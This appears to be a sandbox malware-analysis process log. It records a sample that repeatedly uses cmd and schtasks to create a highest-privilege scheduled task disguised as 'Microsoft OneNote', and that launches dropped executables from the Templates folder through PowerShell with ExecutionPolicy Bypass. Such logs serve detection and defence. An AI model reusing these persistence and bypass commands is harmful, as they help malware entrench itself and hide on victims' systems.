  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:2444

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  - Creates scheduled task(s)
  PID:4284

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:212

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:4784

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:4976

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:764

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:1680

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  - Creates scheduled task(s)
  PID:836

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:2436

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:180

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:4652

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  - Creates scheduled task(s)
  PID:2636

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:4572

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  - Creates scheduled task(s)
  PID:4784

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:3164

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:5112

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:4968

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:4972

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:916

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:4356

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:2884

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:3144

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:2112

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:2760

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:2804

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:2376

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:2368

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:3988

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:4460

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  - Creates scheduled task(s)
  PID:1544
C:\Windows\System32\cmd.exe  2⤵
  "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\ejqcuqc5.3cz.exe"' & exit
  PID:3408

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  3⤵
  powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\ejqcuqc5.3cz.exe"'
  - Command and Scripting Interpreter: PowerShell
  PID:3880

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\ejqcuqc5.3cz.exe  4⤵
  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\ejqcuqc5.3cz.exe"
  - Executes dropped EXE
  PID:1616
C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:3240

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:3856

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:1028

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:1216

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:3044

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:5008

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:4320

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  - Creates scheduled task(s)
  PID:3496

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:4500

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:4636

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:4284

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:1032

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:1112

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  - Creates scheduled task(s)
  PID:1868

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:4572

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  - Creates scheduled task(s)
  PID:4236

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:4448

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:1524

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:1028

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:1044
C:\Windows\System32\cmd.exe  2⤵
  "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\0dugm2zh.vlg.virus"' & exit
  PID:2872

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  3⤵
  powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\0dugm2zh.vlg.virus"'
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  PID:4416
C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:3988

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:3376

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:4464

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:3384

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:2448

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:1524

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:1040

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:1688

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:2252

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  - Creates scheduled task(s)
  PID:2476

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:2792

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:440

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:4416

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  - Creates scheduled task(s)
  PID:1664

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:1040

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  - Creates scheduled task(s)
  PID:848

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:1440

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:4816

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:2792

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:4536

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:4060

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:404

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:1664

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:1976

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:396

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  - Creates scheduled task(s)
  PID:1712

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:4460

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:512

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:640

C:\Windows\system32\schtasks.exe  3⤵
  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
  PID:780

C:\Windows\SYSTEM32\CMD.exe  2⤵
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
  PID:3660
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:2324
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:2424
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:1868
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1912
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:2088
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3100
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:4696
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3624
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:764
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1244
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:4044
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3600
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1360
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4948
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:3128
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:2748
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:2424
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:2420
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:1912
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1564
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:3100
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1500
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:4116
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4080
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:1100
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:1732
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:412
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3560
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:3848
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:2572
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1484
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4152
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:768
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4788
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:3408
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:216
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:780
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3064
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:536
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:4836
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵
- Creates scheduled task(s)
PID:1876
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit2⤵PID:3544
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST3⤵PID:2436
-
-
-
